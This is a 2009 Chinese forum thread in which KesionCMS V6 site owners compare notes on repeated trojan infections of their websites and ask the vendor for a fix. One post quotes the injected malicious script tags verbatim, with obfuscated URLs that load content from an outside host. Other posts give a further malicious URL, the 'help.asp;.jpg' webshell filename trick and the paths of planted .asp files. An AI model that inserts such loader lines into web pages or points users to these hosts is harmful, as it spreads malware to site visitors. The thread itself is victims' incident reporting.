账号通
    

账号  

密码  

3579

查看

11

回复
主题:关于木马,汇总一下 [收藏主题] 转到:  
小栗 当前离线

371

主题

1

广播

0

粉丝
添加关注
级别:三年级

用户积分:2239 分
登录次数:22 次
注册时间:2008/6/3
最后登录:2018/1/22
小栗 发表于:2009/9/15 1:24:00   | 只看该作者 查看该作者主题 楼主 
科汛在线考试系统(NET)

发现一个这样的文件help.asp;.jpg,形成时间和被感染木马病毒的文件是相同的。网站主要是一级目录和二级目录下的列表及.js为后缀的文件容易感染病毒。三级以上目录下的文件一般没事,反而一级或三级目录下一律会出现index为前缀的文件被感染病毒。

 

UploadFiles已设置了无执行权限仍然没法防止中病毒。

 

后台检测木马的程序基本为空设,前台仍然有木马,后台用程序自带的检查木马的设置查找木马竟然会显示“扫描完毕!恭喜您,您的系统很安全,没有发现木马,希望您能保持!”。

 

重新上传了文件,删除了所有的网站文件包括数据库,刷新FTP后,并关闭了FTP,重设了FTP的密码,再登陆上传网站的备份文件,传完后,没出二十分钟,同样感染病毒!

 

不知道还有没有其它在线在处理这个事情的,希望能汇总一下问题,如果自己不能解决,看是否可以给官方提供些参考,好更快解决问题。

 

另有一问题,木马广告指向的网站竟然也是用科汛做的,应该是商业版做的站。

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
小栗 当前离线

371

主题

1

广播

0

粉丝
添加关注
级别:三年级

用户积分:2239 分
登录次数:22 次
注册时间:2008/6/3
最后登录:2018/1/22
小栗 发表于:2009/9/15 5:51:00   | 只看该作者 查看该作者主题 沙发 
科汛在线商城系统(NET)

这个我和楼上的有些近似,虽然我的站推出时间不长,PR值有3,但是访问量不怎么高而且也没和别的站交换链接,因为是彻底的公益网站。商城是准备展示用的,不过目前还没加过一个内容进去。另一个站还在试运行阶段,推出不到一个月吧,所以其实我也有类似楼上站长的疑惑。

 

废话不多说了,希望能把问题综合到一起,供官方尽快找到解决方案。我不是职业站长,这样熬夜的日子在某种意义上是不务正业,只是希望是有意义的吧。

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
xxxcn 当前离线

30

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:536 分
登录次数:29 次
注册时间:2009/2/16
最后登录:2012/5/29
xxxcn 发表于:2009/9/15 5:15:00   | 只看该作者 查看该作者主题 藤椅 
科汛在线商城系统(NET)
补充一下。我用的是 6.0系统 不是sp1 不是eshop版
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
xxxcn 当前离线

30

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:536 分
登录次数:29 次
注册时间:2009/2/16
最后登录:2012/5/29
xxxcn 发表于:2009/9/15 5:13:00   | 只看该作者 查看该作者主题 板凳 

支持这个帖子。我的网站也是被挂“help.asp;.jpg” 强烈顶你。目前介于很多人说和楼主的体验。我暂时关闭了网站。等待官方有没有更进一步说明。

还有疑问。究竟黑客怎么知道我们这些用 科讯程序的网站呢? 我首先声明,我没在论坛上发过自己任何的网址,是刚刚建立的网站。给企业建站的,所以根本不需要我推广,而且访问量很少,搜索很难搜,怎么就知道我的网址了呢?大家分析一下啊。

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
小栗 当前离线

371

主题

1

广播

0

粉丝
添加关注
级别:三年级

用户积分:2239 分
登录次数:22 次
注册时间:2008/6/3
最后登录:2018/1/22
小栗 发表于:2009/9/15 3:00:00   | 只看该作者 查看该作者主题 报纸 

目前我基本清空了空间,但有还几个文件无法删除。文件的路径如下:

Images/Default/bottum.asp

KS_Editor/fckeditor/editor/dialog/fck_spellerpages/C00N.asp

KS_Editor/fckeditor/editor/js/inedx.asp

 

其中我两个站都中了木马,最后无法删除掉的文件及路径都如上三个。并说明一下,我这两个中病毒的站一个是5.5升级成V6的,另一个是V6的第二个测试版升级过来的,同是Eshop版本。另外还用不带商城的4.5做的站目前没丝毫问题。网站都放于同一台服务器。另还有其它文章管理程序做的站也在同一站,到发帖为止还没发现出过任何问题。

 

前面提到的三个文件都无法删除,看来只有到机房去删下看能不能彻底删除这几个文件。或是期待官方出更好的办法解决这问题。

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
小栗 当前离线

371

主题

1

广播

0

粉丝
添加关注
级别:三年级

用户积分:2239 分
登录次数:22 次
注册时间:2008/6/3
最后登录:2018/1/22
小栗 发表于:2009/9/15 2:12:00   | 只看该作者 查看该作者主题 地板 
做在线知识付费 选科汛云开店

你装的是哪个版本?说明一下,看看问题是不是出在同一个版本上。

 

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
cf809 当前离线

366

主题

0

广播

0

粉丝
添加关注
级别:三年级

用户积分:1988 分
登录次数:136 次
注册时间:2009/8/10
最后登录:2012/5/17
cf809 发表于:2009/9/15 2:10:00   | 只看该作者 查看该作者主题 7楼 
科汛在线网校系统

我现在是没办法也睡不着  我安装科讯目录下是动网论坛 想到v6sp1已经完善了才把论坛整合过来 刚整合有四五天就出这个事了 连论坛都中招了 上万个文件被感染 怎么处理?开始认为就js文件的 再一看连html模板都感染了 我的论坛是我自己修改的 做到哪改到哪 复杂的有备份 简单的没备份 现在都不知道哪和哪了 覆盖也没用 打不开了

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
小栗 当前离线

371

主题

1

广播

0

粉丝
添加关注
级别:三年级

用户积分:2239 分
登录次数:22 次
注册时间:2008/6/3
最后登录:2018/1/22
小栗 发表于:2009/9/15 1:55:00   | 只看该作者 查看该作者主题 8楼 
做在线知识付费 选科汛云开店
建议有用KesionCMS V6 SP1 被挂马的跟个帖说明一下,看看是否只有KesionEshop V6版本的被挂马。如果被挂马的都是KesionEshop V6版本的话,那么问题应该可以锁定到这个版本的程序有漏洞。
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
xxxxxxxxxx 当前离线

130

主题

0

广播

0

粉丝
添加关注
级别:一年级

用户积分:878 分
登录次数:44 次
注册时间:2009/9/5
最后登录:2009/10/23
xxxxxxxxxx 发表于:2009/9/15 1:48:00   | 只看该作者 查看该作者主题 9楼 
支持一下 ,希望官方尽早解决此问题!!!
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
小栗 当前离线

371

主题

1

广播

0

粉丝
添加关注
级别:三年级

用户积分:2239 分
登录次数:22 次
注册时间:2008/6/3
最后登录:2018/1/22
小栗 发表于:2009/9/15 1:41:00   | 只看该作者 查看该作者主题 10楼 
科汛在线网校系统

<script src="http://%77%77%77.icxx%77.com/images/logo.s%77f" type="text/javascript" language="JavaScript" id="seraph5script2442"  ></script>

<script src="/ks_inc/ajax.js" type="text/javascript"></script>


<script language="JavaScript" type="text/javascript" id="seraph5script4228" src="http://www.icxxw.co%6D/i%6Dages/logo.swf" 
></script>

http://sd10s.3322.org/jj/4.htm

 

看看就知道了,复制红色的字后就能访问到该站了。不过我最奇怪的就是,我FTP上存了还有两个站也是用科汛做的,保存了密码的,选IP地址就可以登陆,但这两个站没问题,其中有个站的IP地址段和另一个中木马的是同一个。也就是说我的FTP没问题,服务器下的各个站都是独立安全的。到现在已六个小时了,我将中木马的站删了又重新上传备份文件,又中病毒,再查找和修复中毒文件。没办法,科汛的程序里JS文件太多,很多的头文件也中病毒,包括生成静态页面的也中病毒。真让人抓狂。

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.21875秒 powered by KesionCMS 9.0